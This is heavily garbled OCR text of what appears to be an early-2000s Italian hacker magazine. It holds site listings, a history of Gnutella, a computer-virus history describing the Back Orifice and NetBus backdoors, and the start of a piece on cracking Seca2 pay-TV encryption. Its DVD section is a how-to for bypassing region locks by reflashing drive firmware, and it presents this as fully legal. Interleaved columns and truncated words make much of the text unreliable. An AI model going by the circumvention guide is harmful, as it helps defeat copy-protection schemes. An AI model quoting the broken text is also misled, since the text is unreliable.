all'indirizzo http://www.programmazione.it/in- 
dex.php?entity=earticle&idArticle=666&ida- 
rea=28 

Per chi invece preferisse leggerlo nella sua 
versione originale, l'indirizzo è 
http://www.tuxedo.org/~esr/faqs/hacker- 
howto.html rj 


NEI PANNI DEI CATTIVI 

Data Security, società formata da esperti di 
sicurezza informatica, offre alle aziende e 
agli enti pubblici un test che fornisce un'anali- 
si approfondita della sicurezza perimetrale. I 
test vengono eseguiti in remoto, via Internet, 
dal Centro di Ricerca sulla Sicurezza Informa- 
tica con programmi e procedure per indivi- 
duare tutte le possibili vie d'accesso ai siste- 
mi. In questo modo, gli esperti si pongono nel- 
lo stesso punto di vista di un hacker che vo- 
lesse penetrare illegalmente. 
Per le aziende associate a Confindustria e per 
la Pubblica Amministrazione (comuni, 
province, regioni, aziende sanitarie e altri enti 
pubblici) il primo Security Test è gratuito. 
I test possono essere richiesti all'indirizzo 
www.securitytest.it m 


HJ ha surfato per 


M _ m à ^^**^^^^P*H 


www.autistici.org 

Nel manifesto del sito si legge "Per 
iniziare, vogliamo tutto. Socializza- 
re saperi, senza fondare poteri". 
Insieme al progetto gemello 
www.inventati.org, il sito si propo- 
ne di supportare il diritto alla co- 
municazione, alla privacy e all'a- 
nonimato, e di facilitare lo scambio 
delle proprie conoscenze e risorse. 
Per questo, allestisce strumenti e 
risorse come caselle di posta "sicu- 
re", remailer anonimo, proxy, new- 
sgroup, e anche un nodo Freenet. 
Se decidete di usare qualcuno dei 
servizi, non dimenticate di passare 
dalla pagina "Manifesto", dove 
troverete le coordinate per effet- 
tuare una donazione per sostenere 
il progetto. 
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www.gnomixland.com 
Gnomix è un po' come una vecchia 
soffitta dove c'è di tutto, ma biso- 
gna saperlo trovare. C'è molto ma- 
teriale relativo all'hacking, ma an- 
che raccolte di link sugli argomen- 
ti più vari (Mp3, sfondi scrivania, 
avvenenti modelle e gli immanca- 
bili loghi e suonerie). Cercando 
cercando, qualche chicca salta fuo- 
ri, anche se alcune scatole non 
contengono quello che ci si aspetta 
(per ovvi motivi, i link morti sono 
una costante nei siti di hacking). 


1 5 minuti di celebrità! Questi sono i vostri 
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La nuova Era 
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www.theblackwindow.6go.net 

Vorrei promuovere il mio sito hacker, è molto ricco di cose inte- 
ressanti riguardanti rhacking....perfavore visitatelo. 

Alessandro 
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www.fuckinworld.org 

Vi volevo segnalare quest'ot- 
timo sito, per favore segnate- 
lo nei vostri link, ne vale la 
pena. C'è di tutto, anche un 
forum frequentatissimo: 

Alex De Large 


www.pirati.tk 

Saluto tutto lo staff di hac- 
kerjournal... avete fatto un 
sito "SUPER" spero che cre- 
sca sempre di più. ..vi scrivo 
questa email perchè volevo 
segnalarvi il mio sito e il sito 
di tutti i miei collaboratori: 
PiratesZone 
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siti; scegliete voi se tirarvela o vergognarvi 
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http://clanost.interfree.it 

Ciao sono webmaster del sito 
del Clan OST. Siamo una 
neonata crewvi chiedo di se- 
gnalare il sito su HJ speran- 
do di ampliare la crew. Ci ri- 
uniamo in chat ogni sera al- 
le 21:30. 

VladKazama 


www.hackernet.tk 

Salve carissima redazione di 
Hacker Journal, se potete, 
inseritemi tra i vostri link, 
così potrei diffondere meglio 
la cultura hack. 
Grazie in anticipo. 

HackerNet 
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Benvenuti nd mìo silo. 
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http://digilander.libero.it/System_BuG 

Innanzi tutto vi devo fare i miei complimenti sulla rivista dato che è 
molto bella. L'unica cosa che non mi piace molto sono tutte quelle im- 
magini di teschi e le copertine. Cmq a parte questo siete davvero fan- 
tastici!!!! Ora detto quello che volevo dire passo a segnalarvi Turi del 
mio sito e spero che lo metterete nei vostri link!!!! 
Grazie!!!! Ciao. 

[*°System_BuG°*] 
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http://slashdot.org 
Se in rete succede qualcosa che fa 
rumore, state pur sicuri che su 
slashdot se ne parla. Partito come 
sito di informazioni con commenti, 
slashdot è riuscito a conquistarsi 
un gran numero di utenti tra i più 
qualificati: tecno guru, amministra- 
tori, dirigenti, sviluppatori softwa- 
re, e hacker "veri", quelli che non 
hanno bisogno di dichiararlo. Ogni 
giorno questo "popolo digitale" si 
collega, sfoglia le notizie ma so- 
prattutto le commenta, con una 
competenza rara. Slashdot è così 
orientato verso il software libero 
che tutto il software che gestisce il 
sito è open source e liberamente 
scaricabile. 
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http://ildp.pluto.linux.it 
Cercate documentazione su Linux 
in Italiano? Smettete pure di cerca- 
re e andate a questa pagina del 
Pluto Linux User Groups. Si tratta 
infatti della pagina ufficiale delKI- 
talian Linux Documentation Pro- 
ject, e anche se il nome è inglese, 
contiene tutta la documentazione 
italiana esistente sul sistema 
GNU/Llnux: manuali, howto, gui- 
de, tutorial e chi più ne ha più ne 
metta. Risalendo di un ramo l'al- 
bero della directory, si trova il Plu- 
to, uno dei più antichi e numerosi 
gruppi di utenti Linux. 
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UM on Gnutella è possibile 
condividere file su 
Internet, in modo molto 
simile a quanto un tempo si 
faceva con Napster e i brani in 
formato MP3. I principali 
vantaggi di questo protocollo 
sono la possibilità di 
condividere file di qualsiasi 
tipo, e il fatto di non 
dipendere da un'unico ente, 
azienda o server centrale, che 
può essere attaccato dalle case 
di produzione così come è 
avvenuto per Napster e Audio 
Galaxy. Lo svantaggio è che la 
rete Gnutella è molto più 
frammentata: è però possibile 
che cercando un file non lo si 
riesca a trovare, anche se 
questo è presente sull'hard 
disk di un altro utente 
Gnutella. Il sistema prevede 
infatti la presenza di tante 
sotto reti, formate da nodi 
vicini tra di loro. Solo 
all'interno di una sottorete 
c'è un'alta probabilità di 
trovare effettivamente il file 
cercato in tempi ragionevoli. 


www . gnutella . com 

Principale sito 
sul protocollo e 
i vari progammi . 
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www . bearshare . com 

Popolare client 

per Windows, recentemente 

biasimato per l'impiego di 

Spyware. 


http://gtk- 

gnutella . sourcef orge . net 

Client grafico per qualsiasi 
Unix che supporti le librerie 
GTK+ (in versione 1.2 o 
superiore) . 

www . limewire . com 

Client scritto in Java, funziona 
con Windows, Mac e Unix. 
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La storia della suiluppatare appena 
scomparso, che ha diffuso nel mondo il 
protocollo Gnutella per lo scambio di file. 


e aei gruppo cne na cornn- 
lito allo sviluppo e alla diffu- 
>ne di Gnutella, è morto suici- 
i nella sua casa di San Mateo 
California. Un po' perché se 
iva, un po' per chiarire alcune ine- 
sattezze rimbalzate sulla rete, gli dedichia- 
mo questo spazio. 

» La uera storia di 
Gnutella 

Pochi ricordano che Gnutella, uno dei pro- 
tocolli più rivoluzionari della rete, per le 
sue caratteristiche di decentralizzazione 
della condivisione dei file, è stato partorito 
in seno alla più grande multinazionale che 
opera nel settore di Internet e della produ- 
zione artistica e musicale, AOL/Time War- 
ner. Il progetto è infatti stato concepito dal 
gruppo di programmatori di NullSoft, 
azienda che aveva già rilasciato program- 
mi innovativi come WinAmp e ShoutCast, 
rispettivamente per la riproduzione/codifi- 
ca di file Mp3 e per la loro diffusione in 
streaming su Internet. Nel maggio del 

1999 NullSoft è stata acquisita da 
AOL per 70 milioni di dollari. Cifra 
che, che anche nel periodo delle vacche 
grasse di Internet, non era certo da sotto- 
valutare. Si può quindi immaginare con 
quanta sorpresa i vertici di AOL/Time War- 
ner abbiano reagito quando, nel marzo 

2000 hanno scoperto che i ragazzotti che 
si erano appena portati in casa avevano ri- 
lasciato un protocollo e un programma 
che minacciava di minare fin dalle fonda- 
menta alcune delle attività più redditizie 
del gruppo: la produzione musicale e cine- 
matografica. Gnutella permetteva in- 
fatti di condividere file di qualsiasi 
tipo, Mp3 e video compresi, senza 


presTo: la sezione reiauva a onuTena aei si- 
to di NullSoft è stata quindi chiusa nel giro 
di poche ore, per ordini ricevuti dall'alto. 
Ma era già troppo tardi. Tra gli "errori" 
compiuti dal team di sviluppo (errori dal 
punto di vista di AOL, s'intende), ve ne è 
stato uno gravissimo. Pur se per poche ore, 
Gnutella era stato pubblicato come softwa- 
re Open Source, e quindi erano disponibili 
anche i codici sorgenti. Il vaso di pandora 
era stato aperto, e non c'era alcun modo di 
richiuderlo. 

» L'apporto di Gene 

Proprio basandosi sui sorgenti della prima 
versione di Gnutella, Gene Kan e altri pro- 
grammatori hanno potuto mettere a punto 
il protocollo e i software necessari, conti- 
nuando ovviamente a lasciare libero il co- 
dice per ulteriori sviluppi. Per le sue qualità, 
Gene è stato scelto come portavoce del 
gruppo, ed era lui ad apparire in interviste 
e programmi Tv, così come a conferenze 
pubbliche e premiazioni. Anche per que- 
sto, alla notizia della sua morte, molti titoli 
si riferivano a lui come al "padre di Gnu- 
tella", sovrastimando probabilmente il suo 
ruolo nella creazione del protocollo. Que- 
sto non significa però che Gene fosse solo 
una persona "tutta immagine e poca so- 
stanza". Oltre a occuparsi dello svilup- 
po di Gnutella, ha infatti fondato In- 
fraSearch, azienda che si occupava di 
sviluppare un motore di ricerca per reti 
peer to peer. La società è stata in seguito 
acquisita da Sun Microsystems, e Gene 
stesso è passato alle dipendenze della 
mamma di Java. Negli ultimi mesi, Gene 
lavorava infatti al progetto JXTA, col quale 
Sun Microsystems vuole portare il concetto 
del peer to peer sugli accessori più svariati 
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COME MODIFICARE IL CODICE REGIONALE DEI DVD 



TUTTI IL MMIM, UNITEVI! 

Le majors decidono che PEerto film lo può uedere un americano ma non un europeo, 
un africano o un indian. Se anche a uoi questo non piace, e uolete forzare questo 

T "embargo culturale", leggete qui! 


Di tutte le limitazioni all' 
lizzo di un DVD Video in 
ste dalle case di produ 
ne, la più odiosa e ap 
rentemente insulsa è qu 
che riguarda la zona g< 
grafica in cui è possibile vedere il film. 
Alla faccia del libero mercato e delle 
bera circolazione della cultura, le ri 
jors di Hollywood hanno sudd 
so il mondo in sei aree geogn 
che; i lettori DVD venduti in o 
area non possono utilizzare i D 
venduti nelle altre cinque zone 
chiedete loro il perché di questa sce 
li sentirete bofonchiare qualcosa 
guardo alla necessità di frenare la 
rateria e cose simili, ma il vero pun 
che le majors vogliono poter d< 
dere quando e come (se non < 
dirittura "se") un certo film d< 
essere visto dagli abitanti di i 
certa regione. Questo permette 
per esempio di proiettare un film n 
sale europee mesi dopo la sua us 
negli Stati Uniti, senza che gli spett< 
ri europei abbiano già visto il D 
magari acquistato per posta prof 
negli USA. 

Bisogna notare che non è assolu 
mente vietato acquistare un lei 
re di DVD americano, african 
giapponese per poter veder 
film venduti in quelle zone. Il 
ver comprare sei diversi lettori per 
ter vedere qualsiasi DVD regolarmi 
acquistato e pagato, ci pare però 
richiesta un po' troppo esosa. 


» Come Funziona la 
Protezione 

Di uno stesso film, viene prodotto un 
DVD con una codifica differente per 
ogni regione. Inizialmente, i lettori di 
DVD (nel senso di "meccanica" del let- 
tore) erano in grado di leggere i dischi 
di qualsiasi zona, e gli eventuali con- 
trolli venivano fatti a valle (nel caso di 



mappa dell'impero digitale delle case di produzione cinematografica, 
i come in questi casi, è stato azzeccato il motto "Di-Vi-Di et impera". 


computer, dal software di riprodu- 
ce o dal sistema operativo). E evi- 
nte che, se si tratta di un'impostazio- 

software, questa può essere modifi- 


ca a piacimento, e -proprio come ac- 
de con i codici per le gabole dei vi- 
ogiochi- su Internet hanno comin- 
to a circolare le sequenze di tasti da 
jiare sul telecomando del DVD per 
>dificare la zona impostata (per i let- 
i DVD-ROM montati sui PC, esistono 
i programmini che permettono di fa- 
la stessa cosa). 

I finire degli anni 90 però, annusata 
ria che tirava, le majors hanno im- 
sto un'ulteriore limitazione ai pro- 
ttori di DVD: per poter ottenere dal 
r D Forum le chiavi per decifrare i fil- 
mati, i produttori dovevano impegnarsi 
a supportare una nuova tecnologia di 
protezione, chiamata RPC2, che limi- 
tasse la possibilità di modificare l'area 

• geografica del lettore in questione. Il 
sistema RPC2, diventato obbligatorio a 
partire dal primo gennaio 2000, è un 

* po' più sofisticato, ed è implementato 
nel lettore stesso; in ogni lettore DVD 
che utilizza questo sistema è presente 
un contatore. Ogni volta che si mo- 
difica la zona, il contatore viene 


aumentato di uno. Quando il con- 
tatore arriva a 5, la zona non è 
più modificabile se non da un centro 
di assistenza del produttore. Anche 
produttore però ha a disposizione un 
—nero limitato di "azzeramenti" del 
datore; esauriti questi, il DVD è 
bloccato per sempre su una zona. 


» Fatta la legge trouato 
Tinganno! 


Anche in questo caso però, non è < 
modificato l'hardware del lettore, ma 
solo il suo software: i lettori RPC2 sono 
uguali a quelli RPC1 ma hanno un di- 
verso firmware (il software registrato in 
memorie non volatili, necessario al 
funzionamento interno di un apparec- 
chio). Quindi, se è possibile sosti- 
tuire il firmware conforme alle 
specifiche RPC2 con quello prece- 
dente, RPC1, si può avere un let- 
tore di DVD che non si blocca do- 
po cinque modifiche della zona. 
Manco a dirlo, sostituire il firmware 
RPC2 con la precedente versione RPC1 
è possibile, e nemmeno troppo compli- 
cato. Su Internet si trovano collezioni di 
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firmware vecchi ma meno schizzinosi di 
quelli attuali per quanto riguarda i 
cambi di zona. Esistono firmware che 
rendono il lettore "region free" (senza 
più impostazioni di zona, e quindi in 
grado di leggere DVD di qualsiasi re- 
gione), e altri che permettono di modi- 
ficare manualmente la zona senza le li- 
mitazioni imposte dai contatori. 
La fatica maggiore quindi consiste nel- 
l'individuare la marca e il modello 
esatto del proprio lettore DVD (non ba- 
sta guardare la scatola, perché molto 
spesso lo stesso modello viene venduto 
con marchi differenti), e nel trovare la 
versione giusta del firmware. 


> RN'opera 

Prima che vi accingiate a fare quals 
cosa con il vostro lettore DVD, vog 
mo avvisarvi che la modifica 
firmware è sempre un'operazk 
delicata: se qualcosa dovesse and 
storto durante l'operazione (se salt< 
corrente, si impalla il computer o il m 
del firmware scaricato da Internet fosse 
corrotto), il lettore di DVD potrebbe 
diventare inutilizzabile, e solo il 
centro di assistenza potrebbe ripararlo. 
La modifica al firmware inoltre invali- 
da la garanzia; se il lettore è stato 
acquistato da poco, pensateci due vol- 
te prima di rinunciare a un lungo pe- 
riodo di garanzia e supporto gratuito. 

~~ Come prima cosa, bisogna 

ottenere informazioni 
proprio lettore di D\ 

Questa operazione può ess 
svolta con un programma co 
CDVDInfo (http://digital-digest.co 
dvd/downloads/cdvdinfo.html). 5 

~ — amma rivela che il lett 

sgion free", rimane da de- 
terminare se la decodifica av- 
viene nella 
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eo (lettore hardware) o se viene eff 
ta da un programma (via software), 
il lettore è impostato su una zona sn«- 
:a, passate al punto 4. 

- Se la decodifica avviei 
via software, l'impostazio 
regionale può essere bypass 

I ta usando programmi cor 

Dvd Genie (www.inmatrix.com) o Dv~ 
Region Killer (http://digital-digest.com 
/dvd/ downloads/dvdrk.html), senza 
preoccuparsi di altro, e imposte^ 
regione 0. 

Se la decodifica avviene v 
hardware, e il disco è "regi< 
free", bisogna usare d 
programmi che perme 
-o di cambiare le impostazio. 
zona della scheda video senz 
nentare il contatore. Questi prò- 
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Flashare: modificare un 
firmware, che solitamente è 
scritto in un tipo di memoria 
definita "memoria flash". 


grammi variano a seconda del modello 
di scheda video e si trovano all'indirizzo 
http://digital-digest.com/dvd/arti- 
cles/region_hardware.html. Prima di 
usare un DVD Video, bisognerà control- 
lare la regione per cui è stato codificato, 
e modificare le impostazioni usando il 
programma più appropriato. 

— Se il lettore non è "region 
free", occorre fare in modo 
che lo diventi. 

Dopo aver verificato marca e 
modello esatti, andate all'in- 
dirizzo http://digital-digest.com/ 
dvd/downloads/firmware.html o 
sul sito www.firmware.fr.st e scarica- 
te il file corrispondente. Per flashare 
installare) il firmwa- ^ 


e, potrebbe es- 
ere necessario 
caricare anche 
un'utility, che sa- 
rà indicata nella / 


Eiagina in que- / 
tione). Non tutti i ' 
ettori possono 
ssere resi "re 
ion free"; se il 
\ro non fosse nella 
ista, non ci sono soluzioni facilmente 
>raticabili (bisognerebbe cioè copiare 
gni singolo supporto 
WO, eliminando la co- 
3 regionale). 


I MAC E IL 
REGION CODE 


Tutte le cose dette per quanto ri- 
guarda Windows valgono anche 
per Mac, con un'ovvia eccezione: i 
programmi citati sono solo per 
I Windows. Niente paura: anche per 
Mac (Classico e OS X) esiste tutta 
l'attrezzatura necessaria per libe- 
rare il proprio lettore di DVD. Tut- 
te le informazioni, gli strumenti 
necessari e le patch per il firmwa- 
re dei lettori DVD si possono facil- 
mente trovare su Internet. Uno dei 
siti migliori è The Mac DVD Re- 
source, che si trova all'indirizzo 
www.wormintheapple.gr/macdvd. 
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Dopo aver scaricato il firm- 
ware ed eventualmente il 
programma per la sua in- 
stallazione, procedete al- 
l'aggiornamento (anzi, all'invecchia- 

mento), avendo cun 

di lavorare in con- 
dizioni di mas 

ma sicurezza: le 

gete tutte le istru 

zioni che trovate, 

uscite da tutti 1 

programmi, e 

c'è un tempon 

le, forse è megli 

che rimandate l'oper. 

ne. Un inconvenien 

sto punto renderà i 

vostro lettore. 


Dopo aver cambiato le impo- 
stazioni hardware o software, 
conviene far riconoscere nuo- 
vamente il lettore DVD a Win- 
dows (che conserverà altri- 
menti le impostazioni precedenti, impe- 
dendo comunque la visualizzazione di 
DVD di aree diverse). Se tutto è andato 
vrebbe, potrete a questo punto 
'Hervi il vostro film preferito in- 
ìdentemente dall'a- 


stato prodotto, 
cordiamo ancora 
a volta che l'ope- 
razione è perfetta- 
mente legale, ma ren- 
\e nulla la garanzia del 


PER I LETTORI DA 
TAVOLO 
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Con i lettori DVD da tavolo (quelli da 
collegare alla TV, come un videoregi- 
stratore) ovvimente non è possibile met- 
tersi a pistolare con dei programmi per 
carpire le informazioni sulla meccanica 
ed eventualmente flashare il firmware, 
ma non tutto è perduto. Per risparmiare, 
i lettori DVD da tavolo vengono prodotti 
tutti uguali, e poi viene impostato il codi- 
ce regionale in qualche modo. In molti casi è quindi possibile modificare questa 
impostazione di volta in volta, o addirittura rendere il lettore "region free". A volte 
può essere necessario aprire il lettore e spostare un interruttore o un jumper, mol- 
to spesso basta digitare una particolare combinazione di tasti sul telecomando. In 
certi casi non c'è nulla da fare: l'operazione può essere fatta solo da un centro di 
assistenza. La situazione varia da marca a marca, e da modello a modello. Al so- 
lito, Internet si rivela una fonte inesauribile di informazione, Ecco un paio di siti da 
non perdere: 




VCDHelp - DVD Player Hacks 
www.vcdhelp.com/dvdplayershack.php 

Una lista piuttosto nutrita di modelli, ma i tr 
con cautela. 


Usateli 




DVD Reviewer - Multi Region Hacks 
www.dvd.reviewer.co.uk/info/multiregion 

Essendo un sito inglese, ha il pregio di elencare molti lettori con le sigle con cui sono 
venduti in Europa (spesso diverse da quelle degli stes si lettori negli USA). 
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RCE, L'ULTIMA TROVATA 
DELLE MAJORS 

Consapevoli del fatto 
che i lettori possono es- 
sere taroccati (e che in 
certi casi vengono addi- 
rittura venduti già come 
"region free", per esem- 
pio da www.zone- 
IFreedvd.com), la Mo- 
tion Picture Association 
of American (MPAA) ha 
sviluppato un nuovo si- 
stema, chiama- 
to RCE (Regional 
Code Enhan- 
cing), che impe- 
disce la visua- 
lizzazione del DVD 
Video sui lettori "re- 
gion free". L'unico mo- 
do per aggirare la prote- 
zione è quello di impo- 
stare la zona prima di in- 
serire il DVD, ma questo 
ovviamente può essere 
fatto solo con i lettori 
RPC-1. In caso contra- 
rio, dopo cinque cambi 
di zona il lettore si bloc- 
cherà sull'ultima regione 
impostata. Attualmente 
l'RCE è implementato 
solo sui DVD prodotti 
per la zona 1 (USA), 
e non si sa se verrà ap- 
plicato anche altrove. 

AREA ZERO 
NELLO SPAZIO 

Già da un paio di anni, 
sulla stazione spaziale 
internazionale sono stati 
installati due lettori di 
DVD con area code 
uguale a zero. Orbitan- 
do attorno alla terra, la 
piattaforma infatti 
non rientra in alcuna 
delle zone previste. 
La mano lunga delle 
multinazionali dell'intrat- 
tenimento non può arri- 
vare fin lassù. 
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VIRUS 


COME NASCONO E COME SI DIFFONDONO I VIRUS 


Uirus: il fenomeno 


Una breue storia di uno dei fenomeni più deuastanti del lato oscoro 


I virus è un programma. II 
nome VIRUS deriva dal fat- 
to che tali programmi si au- 
toreplicano e sono quindi 
costretti ad attaccarsi ad un 
altro programma. In pratica la stessa cosa 
che farebbe un virus biologico, che per in- 
fettare, replicarsi e vivere nel nostro orga- 
nismo ha bisogno di una cellula. 
I virus sono solitamente scritti da abili pro- 
grammatori, ma in Rete sì trovano ap- 
plicazioni che consentono, anche ai 
meno esperti di creare un virus com- 
plesso con pochi clic. 
Alcuni virus sono scritti solo per la voglia 
del programmatore di mettersi alla prova, 
di 'Vedere se ne è capace" o di dimostra- 
re al mondo la loro bravura. Altri non so- 
no che uno scherzo. A volte intendono in- 
viare un messaggio di protesta o d'altro 
genere. In realtà, solo pochi virus sono 
scritti con lo scopo di provocare danni. 


» La storia dei Uirus 
informatici 

La storia di questo fenomeno nasce con 
l'inizio stesso dell'informatica: 
Nel 1959 tre programmatori dei Bell 
Laboratories svilupparono "Core 
Wars", un gioco in cui ognuno dei pro- 
grammatori scriveva dei programmi in 
grado di riprodursi, nascondendoli nel 
computer. Ad un segnale convenuto, ogni 
virus cercava di riprodursi e distruggere gli 
altri virus. Alla fine vinceva colui che potè- 
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NetBus permette di prendere il totale 
controllo della macchina su cui viene 
installata, quasi sempre a tradimento, la 
versione server del programma. 



va vantare un maggior numero di virus ri- 
prodotti, cioè chi aveva creato il virus 
più potente. Nel 1970 nasce 
Creeper. Si tratta di un vi- 
rus creato da Bob Tho- 
mas diffuso nella 
rete ARPAnet. II 
virus si presen- 
tava scrivendo a 
video "l'm 

Creeper, catch 
me if you cani". 
Negli anni 80 
nasce il primo Ca- 
vallo di Troia. Un 
programmatore creò una 
versione di un famoso gioco 
chiamato Animai, che durante 
l'esecuzione si riproduceva an- 
dandosi a porre in tutti i sistemi 
collegati. Lo scopo del programmatore 
era di diffondere un nuovo metodo di dis- 
tribuzione del software chiamato "Pervasi- 
ve Release". Quel tipo di programma pre- 
se il nome di "cavallo di Troia" per indica- 
re che conteneva al suo interno un agente 
infettivo 

Nel 1985 in Italia nasce Ping Pong, 
un virus che simpaticamente faceva com- 
parire sullo schermo una pallina, la quale 
rimbalzava producendo danni. Ping Pong 
proveniva dal Politecnico di Torino, nello 
stesso istituto universitario fu sviluppata 
l'utilità Devirus che individuava il codice 
Ping Pong e lo eliminava. 
Nel 1986 viene alla luce Brain, un vi- 
rus che infettava il settore di boot del 
floppy disk. Brain fu sviluppato in Pakistan 
da due fratelli, Basit e Amjad. Brain non 
aveva un codice dannoso, ma si limitava a 
riprodursi su tutti i dischetti inseriti nel let- 
tore di un PC infetto modificandone l'eti- 
chetta con il testo "(e) Brain". 
Nel 1990 la complessità dei virus fe- 
ce un passo in avanti. Furono creati, 
infatti, virus definiti polimorfi. Un hacker 
noto come Dark Avenger, distribuì il Muta- 
tion Engine; un programma che consenti- 
va a tutti di creare virus polimorfi, barri- 
vo di Windows 95 segnò un punto di 


••• 


svol- 
ta. Inizia- 
rono ad ap- 
parire i primi 
virus capaci di 
sfruttare le debolezze 
di questo sistema opera- 
tivo. 
Una vera e propria rivoluzione 
avvenne quando si presentò una 
minaccia quasi del tutto inattesa: quella 
dei virus macro. La prima infezione di 
questo tipo ad entrare in libera circolazio- 
ne fu Word.Concept, che usava il lin- 
guaggio di programmazione di Microsoft 
Word. Siccome lo stesso linguaggio di 
scripting viene usato anche da altri pro- 
grammi Microsoft, primo tra tutti Outlook 
e la sua versione gratuita Outlook Express, 
hanno cominciato a diffondersi virus spe- 
cifici per la posta elettronica, che utilizzano 
questi programmi come veicolo di conta- 
gio. Sono quindi nati virus con una veloci- 
tà e una vastità di diffusione mai vista pri- 
ma: Melissa, I Love You e molti altri. 


» Trojan e Backdoor 

La tipologia di virus che più minaccia la 
nostra privacy è quella dei cavalli di Troia, 
o meglio una loro sotto-tipologia chiama- 
ta Backdoor Trojan. Sono costituti da 
un'applicazione di tipo client e da un ser- 
ver (che risiede sul computer infetto). 
La parte server può essere inserita all'in- 
terno di un qualsiasi file eseguibile e rap- 
presenta il file che sarà diffuso mediante 
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della Distruzione 


dell'hacking, con una descrizione delle tipologie principali di uirus. 


e-mail o attraverso un qualunque softwa- 
re Una volta attivata l'applicazione server, 
chi ha il client e le chiavi di accesso 
può prendere il controllo completo 
della macchina server, ed efefttuare 
operazioni di trasferimento file, 
controllo della rete, ricerca di pas- 
sword, apertura del lettore CD e de- 
cine di altre operazioni. 



Euristica: una tecnologia antivirus 
che tiene sotto controllo alcuni sintomi 
tipici della presenza di un virus come 
ad esempio modifiche non previste 
nella dimensione del file. 


Le BackDoor più conosciute sono senza 
dubbio Back Orifice e NetBus. 
Back Orifice è una backdoor proget- 
tata per Windows e permette di pren- 
dere il controllo di una macchina. Gli in- 
trusi possono accedere al server di BO 
usando un'interfaccia testuale per Unix o 
un client grafico per Windows. Il server di 
BO permette agli intrusi di eseguire co- 
mandi, leggere file ed eseguire trasferi- 
menti di file da e verso la vostra macchina, 
modificare il registry, avviare e fermare i 
processi e tantissimi altri trucchi. NetBus 
consente, tramite un semplice pan- 
nello di controllo, di svolgere le stes- 
se funzioni di BO ed altre ancora. Tra 
queste l'apertura del microfono del vostro 
Pc, trasformandolo in una cimice che 
ascolta quello che state dicendo. 


» Carne difendersi 

Per diminuire il rischio d'infezioni occorre 
istallare un antivirus e aggiornarlo 
frequentemente (almeno su base men- 
sile). Avere un antivirus non aggiornato 
equivale a non averlo! E' opportuno con- 
trollare periodicamente la presenza di vi- 
rus nel proprio computer, sottoponendo a 
controllo qualsiasi CD o floppy di prove- 
nienza sospetta prima di eseguire uno dei 
file in esso contenuti. Non bisogna ese- 
guire mai programmi d'origine sco- 


nosciuta. Controllare tsempre utti i file che 
s'immettono nel sistema, anche perché la 
diffusione dei virus avviene mag- 
giormente con lo scambio di file tra 
amici o per email. La posta elettronica è 
uno dei principali mezzi di diffusione di vi- 
rus: basta aprire il file infetto allegato a un 
messaggio per essere contagiati. E oppor- 
tuno controllare sempre i file allegati con 
un programma antivirus. In particolare oc- 
corre controllare i file che presentano le 
estensioni: exe, dll, com, sys, vbx, pif, scr, 
ocx, vbs ed i file documento che possono 
contenere anche macro: doc, xls, dot, xla. 


TIPOLOGIE DI VIRUS 


Esistono vari tipi di virus informatici, 
catalogabili in base a come si compor- 
tano, sopravvivono, si autotrasmettono 
e così via. Eccone un elenco: 

BOOT SECTOR VIRUS: infettano la parte 
di un floppy o hard disk contenente 
informazioni necessarie all'avvio del 
sistema. La diffusione avviene general- 
mente quando si avvia un PC da un 
floppy infetto. 

FILE VIRUS: sono dei virus che infettano 
file di programmi (con estensioni .exe, 
.com, ecc.) e si replicano ad ogni avvio 
del programma infetto. 

MACRO VIRUS: è il tipo di virus più dif- 
fuso. In pratica è un programma scritto 
in Visual Basic (VBA, ovvero Visual Ba- 
sic for Applications). 

MULTIPARTITE VIRUS: per diffondersi 
utilizza una combinazione di tecniche. 
Il tipo più comune unisce il metodo di 
lavoro di un virus di boot e di file. 

POLYMORPHIC VIRUS: è un virus che 
muta ogni volta che si riproduce. 

STEALTH VIRUS: utilizza vari trucchi per 
nascondersi e sfuggire ai software anti- 


Un metodo per difendersi da programmi di 
BackDoor Trojan è di istallare un buon 
programma di rilevazione e aggior- 
narlo frequentemente. Questo pro- 
gramma dovrebbe essere affiancato da un 
FireWall, che controlla rigorosamen- 
te tutti i programmi che tentano di 
accedere ad Internet e segnala chi cer- 
ca di entrare nel nostro computer. Ovvia- 
mente, il sistema più sicuro di tutti è quello 
di lasciare stare il Computer ed usare la 
Macchina da Scrivere!! &■ 

Nazzareno Schettino - www.notrace.it 


virus. In generale sono virus che infet- 
tano il DOS. Esistono molte varianti di 
questo virus: 

MBR STEALTH questo virus infetta 
l'MBR "master boot record 77 salvando 
una copia del MBR originale che sosti- 
tuisce a quella infetta quando un anti- 
virus va a controllare la sezione dei 
master boot record. 

CLEAN ON-THE-FLY: questo virus inter- 
cetta tutte le operazioni di lettura sui fi- 
les. Se un antivirus legge un file infet- 
to, il virus intercetta l'operazione di let- 
tura e ripulisce il file rendendolo nor- 
male al controllo, una volta finita l'ope- 
razione il virus reinfetta il file. 

TROJAN VIRUS: è un programma che al 
suo interno contiene un sottocodice 
dannoso che si attivava al determinarsi 
di certe condizioni. 

ZOO VIRUS: sono virus che vivono solo 
nei laboratori di ricerca perché non so- 
no riusciti a diffondersi. 

IN-THE-WILD VIRUS: sono dei virus che 
vivono allo stato selvaggio, cioè sono 
sfuggiti al controllo e sono attualmente 
in circolazione. 
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COME NASCONO E COME SI DIFFONDONO I VIRUS 


Seca2: è tutto oro 


Sona passati quasi due mesi dalla "Operazione ^L 
Nuoua Smart Card", e su Internet si parla solo di .-*— 


a La lunga battaglia fra Telepiù 
Digitale e gli Hackers sem- 
brerebbe conclusa. Nei corri- 
doi milanesi i tecnici dell'e- 
mittente televisiva sono fieri 
del lavoro svolto e sono con- 
vinti di aver segnato un punto fonda- 
mentale contro la pirateria grazie al- 
l'installazione del Seca MediaGuard 
2.0: "Con la chiusura del vecchio siste- 
ma e l'introduzione del nuovo sistema 
Mediaguard portiamo a compi- 
mento la più importante 
operazione anti- 
pi rateria 
m a i 
fatta in 
Italia", 
ha di- 
chiarato 
Olivier Ge- 
rolamo Am- 
ministratore 
Delegato di 
Tele + , "com- 
piendo un salto 
tecnologico nella 
difesa dell'esclu- 
sività dei nostri 
programmi che pre- 
sto convincerà anche 
i più scettici. Il nuovo 
sistema non solo è 
estremamente complesso, ma è dotato 
anche di efficaci misure di autodifesa 
capaci di bloccare i tentativi di intrusio- 
ne. D'ora in avanti si potrà avere ac- 
cesso ai programmi trasmessi da Tele- 
più Digitale solo abbonandosi regolar- 
mente." ... 

Contemporaneamente, da qualche al- 
tra parte in Italia -e crediamo anche 
all'estero- c'è qualcuno che non dor- 
me per cercare di carpire i segreti di 
questa nuova codifica. 
Attenzione: distinguiamo Hackers da 
Commercianti disonesti. I primi sono 
legati al "Sat" da una passione mania- 



cale che li porta a stare da- 
vanti al PC anche per 12 
ore di fila, benché agisca 
no illegalmente cercando 
di decifrare le trasmis- 
